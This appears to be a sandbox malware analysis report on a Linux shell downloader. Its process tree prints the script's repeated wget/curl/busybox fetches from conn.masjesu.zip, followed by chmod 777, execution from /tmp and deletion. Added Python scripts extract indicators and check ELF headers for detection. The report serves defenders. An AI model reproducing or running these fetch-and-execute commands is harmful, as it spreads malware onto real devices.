Analysis
max time kernel: 103s
max time network: 105s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 25/10/2024, 01:12

Static task: static1
Behavioral task behavioral1: sample 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh, resource debian9-armhf-20240729-en
Behavioral task behavioral3: sample 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh, resource debian9-mipsel-20240418-en

The platform and resource above identify the run detailed on this page as behavioral4 (Debian 9, little-endian MIPS). The same script was also submitted against amd64, armhf and big-endian MIPS images, which is the usual way to exercise a multi-architecture downloader: each architecture's run will only be able to execute the payload built for it.
General
Target: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Size: 10KB
MD5: f36cbd463f4b21236b1338c03dbfd8e4
SHA1: 22a27ede29be8ec1c42b17c43a162e2d9ab3a265
SHA256: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
SHA512: 74f54cf55aaa5b35951ff883a64e3a584f03c6952de36b92558993d20093f641c9f3aab6c7d659cef4c8c0cf84b8762f370d1ed768b48d717f130bd7f6f91e9a
SSDEEP: 96:Yqin/wN/wN/w7vQ4vxL1VMQWGmXr87XnNHNbNk3WKJUIEBL7XMWxWpWhC+kacagk:C6eET5AQtxk3vJ+tqkotxk3vb36eETGB
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process chmod, 28 invocations, one "chmod 777 <name>" per download cycle. PIDs: 783, 800, 813, 844, 851, 858, 868, 875, 882, 889, 896, 903, 910, 917, 924, 931, 938, 945, 952, 959, 966, 973, 980, 987, 994, 1001, 1008, 1015.

Executes dropped EXE (28 IoCs)
Fourteen distinct files under /tmp, each executed twice (PID of the first and of the second execution):
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH: 785, 1002
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h: 801, 1009
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM: 814, 1016
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd: 845, 925
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM: 852, 932
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI: 859, 939
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG: 869, 946
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B: 876, 981
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg: 883, 988
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj: 890, 953
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy: 897, 960
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc: 904, 967
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5: 911, 974
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw: 918, 995

Reads runtime system information (28 IoCs)
File opened for reading: /proc/sys/crypto/fips_enabled, by curl, 28 times (once per curl invocation). curl's TLS/crypto library checks whether the kernel is in FIPS mode when it initialises, so this read happens on every curl run regardless of what is fetched. The signature reflects the downloader's choice of tool, not behaviour of the fetched files.

System Network Configuration Discovery (1 TTP, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
Tagged processes, grouped by tool:
curl (22): 771, 804, 827, 848, 855, 865, 872, 886, 893, 900, 914, 928, 935, 942, 949, 956, 963, 970, 984, 991, 998, 1012
wget (18): 720, 803, 847, 871, 878, 885, 892, 899, 906, 927, 934, 941, 948, 955, 962, 969, 997, 1004
busybox (24): 779, 799, 809, 842, 850, 857, 867, 874, 881, 895, 902, 909, 916, 923, 930, 937, 951, 958, 965, 979, 986, 1000, 1007, 1014
All 64 hits are the downloader's own wget, curl and busybox wget invocations; the tag records network-configuration reads those tools perform while fetching the URLs, not a separate reconnaissance step by the script.

Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
File opened for modification by curl (curl -O writes into the working directory, which is /tmp), each of the 14 names twice:
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH, /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h, /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM, /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd, /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM, /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI, /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG, /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B, /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg, /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj, /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy, /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc, /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5, /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw
Only the curl writes are tagged; the wget and busybox wget downloads of the same URLs carry no write signature.
Processes

Root: PID 715, /tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh (the submitted script, depth 1). Every other process in the tree is its direct child (depth 2); nothing runs deeper, so none of the executed /tmp files spawned a process of its own.

First child:
PID 717   /bin/rm   /bin/rm bins.sh

The script then runs the same six-step cycle for 14 payload names, and then repeats all 14 a second time: 28 cycles, 168 child processes. Per cycle, with <name> substituted:
  wget      image /usr/bin/wget   command: wget http://conn.masjesu.zip/bins/<name>
  curl      image /usr/bin/curl   command: curl -O http://conn.masjesu.zip/bins/<name>
  busybox   image /bin/busybox    command: /bin/busybox wget http://conn.masjesu.zip/bins/<name>
  chmod     image /bin/chmod      command: chmod 777 <name>
  exec      image /tmp/<name>     command: ./<name>
  rm        image /bin/rm         command: rm <name>

Signature tags in the table: N = System Network Configuration Discovery, R = Reads runtime system information, T = Writes file to tmp directory, - = no tag on that process. Every chmod is tagged File and Directory Permissions Modification and every exec is tagged Executes dropped EXE, so those columns give only the PID.

cycle  name                                 wget      curl       busybox   chmod  exec  rm
1      3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH   720 N     771 RNT    779 N     783    785   789
2      q8by6B3GMmnW2fqzokCod3DStJogu7sm1h   790 -     797 RT     799 N     800    801   802
3      eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM   803 N     804 RNT    809 N     813    814   817
4      Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd   818 -     827 RNT    842 N     844    845   846
5      SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM   847 N     848 RNT    850 N     851    852   853
6      EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI   854 -     855 RNT    857 N     858    859   860
7      v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG   861 -     865 RNT    867 N     868    869   870
8      GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B   871 N     872 RNT    874 N     875    876   877
9      GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg   878 N     879 RT     881 N     882    883   884
10     KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj   885 N     886 RNT    888 -     889    890   891
11     IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy   892 N     893 RNT    895 N     896    897   898
12     IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc   899 N     900 RNT    902 N     903    904   905
13     XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5   906 N     907 RT     909 N     910    911   912
14     Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw   913 -     914 RNT    916 N     917    918   919
15     Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd   920 -     921 RT     923 N     924    925   926
16     SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM   927 N     928 RNT    930 N     931    932   933
17     EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI   934 N     935 RNT    937 N     938    939   940
18     v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG   941 N     942 RNT    944 -     945    946   947
19     KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj   948 N     949 RNT    951 N     952    953   954
20     IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy   955 N     956 RNT    958 N     959    960   961
21     IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc   962 N     963 RNT    965 N     966    967   968
22     XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5   969 N     970 RNT    972 -     973    974   975
23     GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B   976 -     977 RT     979 N     980    981   982
24     GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg   983 -     984 RNT    986 N     987    988   989
25     Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw   990 -     991 RNT    993 -     994    995   996
26     3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH   997 N     998 RNT    1000 N    1001   1002  1003
27     q8by6B3GMmnW2fqzokCod3DStJogu7sm1h   1004 N    1005 RT    1007 N    1008   1009  1010
28     eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM   1011 -    1012 RNT   1014 N    1015   1016  1017

Only one host is contacted in the whole tree: conn.masjesu.zip, path /bins/<name>. The three fetch tools are tried back to back for every name so that the script works on a minimal busybox-only device as well as on a full distribution.
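The process tree above is the most useful part of this report for detection work: the downloader chain (fetch with wget, curl and busybox wget, chmod 777, run from /tmp, delete) repeats for every payload name, and the contacted host and dropped paths are the indicators to block. The script below is an added example, not code from the sandbox or from the sample. It takes the tree in the raw form the report renders it (image path and command line fused together, a depth digit, the arrow and the PID), splits those fused lines, classifies each child as a stage of the chain, extracts the host, URLs and dropped paths, and reports every complete fetch-chmod-exec-rm run. The embedded input is a constructed subset: two of the 28 cycles, copied from the tree with their real PIDs.

```python
"""Extract IoCs and the drop-and-execute chain from a Triage-style Linux
process tree.  Added example, not part of the report.  SAMPLE_TREE is a
constructed excerpt (2 of 28 cycles) in the report's raw rendering:
'<image path><command line><depth>⤵PID:<pid>'."""
import re
from collections import defaultdict
from urllib.parse import urlparse

SAMPLE_TREE = """\
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh1⤵PID:715
/bin/rm/bin/rm bins.sh2⤵PID:717
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:720
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:771
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:779
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:783
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:785
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:789
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:790
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:797
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:799
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:800
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:801
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:802
"""

LINE_RE = re.compile(r"^(?P<fused>.+?)(?P<depth>\d+)⤵PID:(?P<pid>\d+)$")
FETCH_RE = re.compile(r"(?:^|\s)(?:wget|curl)\b.*?(https?://\S+)")


def split_fused(fused):
    """Recover (image path, command line) from the fused string: the command
    line starts with the image's basename, './' + basename, or the full image
    path, followed by a space or the end of the string."""
    for i in range(2, len(fused) + 1):
        path, rest = fused[:i], fused[i:]
        if " " in path or path.endswith("/"):
            continue
        base = path.rsplit("/", 1)[-1]
        for prefix in (base, "./" + base, path):
            if rest.startswith(prefix) and rest[len(prefix):len(prefix) + 1] in ("", " "):
                return path, rest
    raise ValueError(f"cannot split process line: {fused!r}")


def parse_tree(text):
    """One dict per process (pid, depth, image, cmd), sorted by PID."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            image, cmd = split_fused(m["fused"])
            procs.append({"pid": int(m["pid"]), "depth": int(m["depth"]),
                          "image": image, "cmd": cmd})
    return sorted(procs, key=lambda p: p["pid"])


def stage(p):
    """Classify a child as a downloader stage: (kind, file name, detail)."""
    m = FETCH_RE.search(p["cmd"])
    if m:                                    # wget / curl -O / busybox wget
        return "fetch", m.group(1).rsplit("/", 1)[-1], m.group(1)
    argv = p["cmd"].split()
    if argv[0] == "chmod" and len(argv) == 3:
        return "chmod", argv[2], argv[1]     # detail = requested mode
    if argv[0].startswith("./"):             # execution of the dropped file
        return "exec", argv[0][2:], p["image"]
    if argv[0].rsplit("/", 1)[-1] == "rm" and len(argv) == 2:
        return "rm", argv[1], None
    return "other", None, None


def extract_iocs(procs):
    stages = [stage(p) for p in procs]
    urls = {d for k, _, d in stages if k == "fetch"}
    dropped = {d for k, _, d in stages if k == "exec"}
    return {"hosts": sorted({urlparse(u).hostname for u in urls}),
            "urls": sorted(urls), "dropped": sorted(dropped)}


def find_chains(procs):
    """Every fetch -> chmod -> exec -> rm run on one file name.  A full report
    repeats each name, so a new run starts when a fetch follows an rm."""
    runs = defaultdict(list)                 # name -> list of runs (event lists)
    for p in procs:
        kind, name, detail = stage(p)
        if name is None:
            continue
        if not runs[name] or (kind == "fetch" and runs[name][-1][-1][0] == "rm"):
            runs[name].append([])
        runs[name][-1].append((kind, p["pid"], detail))
    chains = []
    for name, name_runs in runs.items():
        for events in name_runs:
            kinds = [k for k, _, _ in events]
            first = [kinds.index(k) for k in ("fetch", "chmod", "exec", "rm") if k in kinds]
            if len(first) == 4 and first == sorted(first):   # all four, in order
                chains.append({"name": name,
                               "fetch_pids": [pid for k, pid, _ in events if k == "fetch"],
                               "mode": next(d for k, _, d in events if k == "chmod"),
                               "exec_pid": next(pid for k, pid, _ in events if k == "exec")})
    return chains


if __name__ == "__main__":
    procs = parse_tree(SAMPLE_TREE)
    print(extract_iocs(procs))
    print(find_chains(procs))
```

Run it on the full tree pasted from the report and `find_chains` returns 28 runs over 14 names, all with mode 777, which is the behavioural pattern worth alerting on in EDR telemetry: a shell process whose children fetch into /tmp, chmod 777 the result, execute it from /tmp and delete it, all within seconds. The split heuristic depends on the command line starting with the image's basename or path, which holds for every line in this report but would need adjusting for a tool invoked through a symlink with a different name.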
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

A single 153-byte download is recorded. That is far too small to be an ELF bot binary for any of the targeted architectures, so the 28 "Executes dropped EXE" hits almost certainly ran a non-executable server response (an error or placeholder page) rather than a payload; consistent with that, none of the executed /tmp files spawns a child process in the tree. The hashes above identify that response and can be used to recognise other reports that hit the same dead distribution point.
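Before a downloaded "bins" file is treated as a payload it is worth checking what it actually is: a valid ELF for the sandbox that ran it, an ELF for one of the other targeted architectures, a truncated header, or, as the 153-byte size here suggests, not an ELF at all. The script below is an added example, not code from the report. It decodes the ELF identification bytes and the machine field, and maps the result onto the four behavioural targets listed at the top of the page (amd64, armhf, mipsbe, mipsel). The ELF headers it tests against are constructed by hand in the `make_header` helper; they are not bytes from the report's download.

```python
"""Classify a fetched blob against the report's sandbox targets.  Added
example, not part of the report; the test inputs are constructed."""
import struct

E_MACHINE = {0x03: "x86", 0x08: "mips", 0x28: "arm", 0x3E: "x86-64", 0xB7: "aarch64"}
E_TYPE = {2: "EXEC", 3: "DYN"}
# The report's four behavioural targets as (machine, endianness).
SANDBOX_ARCH = {"amd64": ("x86-64", "little"), "armhf": ("arm", "little"),
                "mipsbe": ("mips", "big"), "mipsel": ("mips", "little")}


def elf_identity(blob):
    """Decode e_ident, e_type and e_machine; None if blob is not an ELF."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = blob[4], blob[5]          # 1/2 = 32/64-bit, 1/2 = LE/BE
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return {"bits": 32 if ei_class == 1 else 64,
            "endian": "little" if ei_data == 1 else "big",
            "machine": E_MACHINE.get(e_machine, f"unknown(0x{e_machine:x})"),
            "type": E_TYPE.get(e_type, f"unknown({e_type})"),
            # ELF32 headers are 52 bytes, ELF64 headers 64 bytes.
            "complete_header": len(blob) >= (52 if ei_class == 1 else 64)}


def classify_download(blob, sandbox):
    """Verdict for one fetched blob on one of the report's sandbox targets."""
    info = elf_identity(blob)
    if info is None:
        return "not-elf"             # e.g. an HTTP error page saved by curl -O
    if not info["complete_header"]:
        return "truncated-elf"
    if (info["machine"], info["endian"]) != SANDBOX_ARCH[sandbox]:
        return "wrong-arch"
    return "runnable"


def make_header(ei_class, ei_data, e_machine, e_type=2):
    """Constructed test input: a bare ELF header with no segments."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    if ei_class == 1:   # ELF32: e_entry, e_phoff, e_shoff are 32-bit
        body = struct.pack(endian + "HHIIIIIHHHHHH", e_type, e_machine, 1,
                           0, 0, 0, 0, 52, 32, 0, 40, 0, 0)
    else:               # ELF64: they are 64-bit
        body = struct.pack(endian + "HHIQQQIHHHHHH", e_type, e_machine, 1,
                           0, 0, 0, 0, 64, 56, 0, 64, 0, 0)
    return ident + body


MIPS_LE = make_header(1, 1, 0x08)
MIPS_BE = make_header(1, 2, 0x08)
ARM_LE = make_header(1, 1, 0x28)
X86_64 = make_header(2, 1, 0x3E)
# Constructed stand-in for a small non-ELF response such as an error page.
HTML_PAGE = b"<html><head><title>404 Not Found</title></head><body>404</body></html>"

if __name__ == "__main__":
    for label, blob in (("mips-le", MIPS_LE), ("x86-64", X86_64), ("html", HTML_PAGE)):
        print(label, {s: classify_download(blob, s) for s in SANDBOX_ARCH})
```

Feed it the bytes from the Downloads entry (or any file curl left in /tmp) and "not-elf" confirms that the execution stages in the tree could not have done anything. The check reads only the ELF header, so it does not distinguish armhf from armel (that lives in e_flags) and says nothing about whether a valid ELF is actually a bot binary; it is a triage filter, not a verdict.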